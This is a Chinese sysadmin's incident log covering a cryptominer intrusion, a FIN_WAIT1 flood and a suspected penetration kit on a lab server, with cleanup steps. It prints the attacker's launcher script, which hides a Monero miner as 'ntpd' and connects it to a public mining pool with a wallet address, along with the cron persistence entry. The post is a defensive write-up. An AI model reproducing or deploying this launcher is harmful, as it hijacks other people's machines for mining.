服务器被入侵增加用户,服务器被入侵事件小记

Alice服务器被挖矿程序入侵

第一个事件是服务器被挖矿程序入侵，导致CPU资源被大量占用

1. top发现有一个进程占用非常高

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

105990 root 20 0 2449864 74544 2132 S 3099 0.1 6772:46 md

2. ps aux | grep 105990 发现了

root 105990 3092 0.0 2449864 74544 ? SLl 13:22 6782:51 ntpd -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re

(中间有很长一段空格)

根据「cryptonight」查阅信息，猜想是挖矿程序

3. 查找find / -name md 发现有

/dev/shm/.ntld-vslt/md

4. kill掉进程 发现过一会又自动启动，于是通过crontab -e查看是否有定时任务。果然有：

* * * * * /dev/shm/.ntld-vslt/upd >/dev/null 2>&1

用crontab -r删除

5. 查看/dev/shm/.ntld-vslt/ 目录

drwxr-xr-x 2 root root 240 Jan 11 20:53 .

drwxrwxrwt 3 root root 60 Jan 11 13:17 ..

-rw-r–r– 1 root root 7 Jan 11 13:22 ?

-rwxr-xr-x 1 root root 329 Oct 27 21:30 a

-rw-r–r– 1 root root 7 Jan 11 13:22 bash.pid

-rwxr-xr-x 1 root root 50 Jan 9 20:08 cron.d

-rw-r–r– 1 root root 20 Jan 9 20:08 dir.dir

-rwxr-xr-x 1 root root 14304 Nov 29 02:29 h64

-rwxr-xr-x 1 root root 2979640 Sep 10 11:39 md

-rwxr-xr-x 1 root root 797 Dec 16 01:41 run

-rwxr-xr-x 1 root root 206 Jan 9 20:08 upd

-rwxr-xr-x 1 root root 24 Oct 5 02:45 x

可以看到run中是这样的脚本：

#!/bin/bash

proc=`nproc`

ARCH=`uname -m`

HIDE=”ntpd”

if [ “$ARCH” == “i686” ]; then

./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &

elif [ “$ARCH” == “x86_64” ]; then

./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &

else

./h64 -s $HIDE ./mdx -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &

fi

echo $! > bash.pid

6. 修改权限，删除目录并备份存档

7. 开启ufw防火墙

Alice服务器遭到大量fin_wait1攻击

第二个事件是服务器遭到fin_wait1攻击，导致响应缓慢

1. 通过命令 netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’  查看各种类型数据包的数量：

LAST_ACK 1

CLOSE_WAIT 10

ESTABLISHED 5

FIN_WAIT1 1869

FIN_WAIT2 4

TIME_WAIT 5

2.编辑文件 vim /etc/sysctl.conf文件，增加：

net.ipv4.tcp_fin_timeout = 10

net.ipv4.tcp_keepalive_time = 30

net.ipv4.tcp_window_scaling = 0

net.ipv4.tcp_sack = 0

再执行以下命令，让修改结果立即生效：

/sbin/sysctl -p

参考博客：http://blog.csdn.net/talent210/article/details/65441819

服务器疑似被vlun渗透

1. 在检测服务器性能时，发现top有如下未知程序：

2.kill之后还会重现，查看其父进程：

3. 通过搜索class文件，找到如下目录。猜想是vlun渗透程序。参考资料：http://www.91ri.org/11497.html

在此目录中发现了明文存放的此服务器各用户名密码，以及我组数台服务器的root密码。

4. 将此文件夹备份，删除解决。提醒各服务器维护人员，定期检查系统，检查远程登录记录，定期修改root密码。

建议在防火墙里关闭ssh校外远程登入。